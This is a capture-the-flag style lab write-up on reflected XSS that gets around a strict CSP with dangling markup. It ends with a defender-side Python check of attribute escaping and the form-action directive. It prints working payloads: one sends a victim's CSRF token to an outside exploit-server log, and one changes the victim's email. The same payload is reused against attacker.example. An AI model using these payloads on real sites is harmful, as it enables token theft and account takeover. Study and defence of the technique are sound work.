LAB 29 - Reflected XSS protected by very strict CSP, with dangling markup attack

Initial instructions

This lab uses a strict CSP that blocks outgoing requests to external web sites.

To solve the lab, first perform a cross-site scripting attack that bypasses the CSP and exfiltrates a simulated victim user's CSRF token using Burp Collaborator. You then need to change the simulated user's email address to hacker@evil-user.net.

You must label your vector with the word "Click" in order to induce the simulated user to click it. For example: Click me

You can log in to your own account using the following credentials: wiener:peter

First of all, I logged in with the given credentials and tried to change the email manually via a GET parameter in the URL, which may indicate a possible injection point for XSS.

Once we know this, we can try to exfiltrate the CSRF token with the following payload to see if it's vulnerable.

<script>
// Close the reflected value attribute and the real form, then open a dangling form that
// points at the exploit server; the page's hidden csrf input that follows is swallowed into it.
location = 'https://LAB-ID.web-security-academy.net/my-account?email="></form><form class="login-form" name="change-email-form" action="https://EXPLOIT-SERVER-ID.exploit-server.net/log" method="GET"><button class="button" type="submit">Click me</button>';
</script>

If we click Store and then view the exploit, we can see how the payload is rendered.

If we press Click me, it redirects us to the exploit server's log, where we can see the CSRF token being exfiltrated.

So we can build the following payload to send to the victim and change their email.

<script>
// Same dangling form, now posting back to the change-email endpoint with the new
// address as a hidden field; the victim's own csrf input completes the request.
location = 'https://LAB-ID.web-security-academy.net/my-account?email="></form><form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST"><button class="button" type="submit">Click me</button><input required type="hidden" name="email" value="astro@astro.net">';
</script>

So let's deliver the exploit to the victim.

Congratulations, you solved the lab!
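As an added defender-side illustration that is not part of the original writeup, the Python below reproduces why the dangling form captures the csrf input and checks the two fixes the lab's application lacks: attribute-escaping the reflected email and a form-action directive in the CSP. The form markup and the attacker.example host are constructed assumptions; the form attributes mirror the ones used in the payloads above.

```python
import html
import re

# Constructed approximation of the lab's change-email form: the reflected email lands
# in a value attribute and the csrf input follows it (assumed markup, not the lab's source).
FORM_TEMPLATE = (
    '<form class="login-form" name="change-email-form" '
    'action="/my-account/change-email" method="POST">'
    '<input required type="email" name="email" value="{email}">'
    '<input required type="hidden" name="csrf" value="{csrf}">'
    '<button class="button" type="submit">Update email</button></form>'
)

# The writeup's dangling-markup payload, aimed at a constructed attacker host.
PAYLOAD = ('"></form><form class="login-form" name="change-email-form" '
           'action="https://attacker.example/log" method="GET">'
           '<button class="button" type="submit">Click me</button>')


def render_form(email: str, csrf: str, escape: bool) -> str:
    """Render the form; escape=False reproduces the lab's raw reflection."""
    if escape:
        email = html.escape(email, quote=True)  # " becomes &quot;, so the attribute cannot be closed
    return FORM_TEMPLATE.format(email=email, csrf=csrf)


def csrf_lands_in_foreign_form(markup: str) -> bool:
    """True when the csrf input sits inside a form whose action is off-origin.
    Tags are scanned in order: <form action=...> opens, </form> closes, and the
    form that is open when name="csrf" appears is the one that will submit it."""
    current_action = None
    for m in re.finditer(r'<form\b[^>]*\baction="([^"]*)"|</form>|name="csrf"', markup):
        if m.group(0) == "</form>":
            current_action = None
        elif m.group(0) == 'name="csrf"':
            return current_action is not None and current_action.startswith("http")
        else:
            current_action = m.group(1)
    return False


def form_exfil_allowed(header: str) -> bool:
    """True when the CSP still lets a form submit off-origin: form-action does not
    fall back to default-src, so a script/connect lockdown like the lab's is not enough."""
    for chunk in header.split(";"):
        parts = chunk.split()
        if parts and parts[0].lower() == "form-action":
            return any(p.lower() not in ("'self'", "'none'") for p in parts[1:])
    return True  # no form-action directive at all, browsers allow any target
```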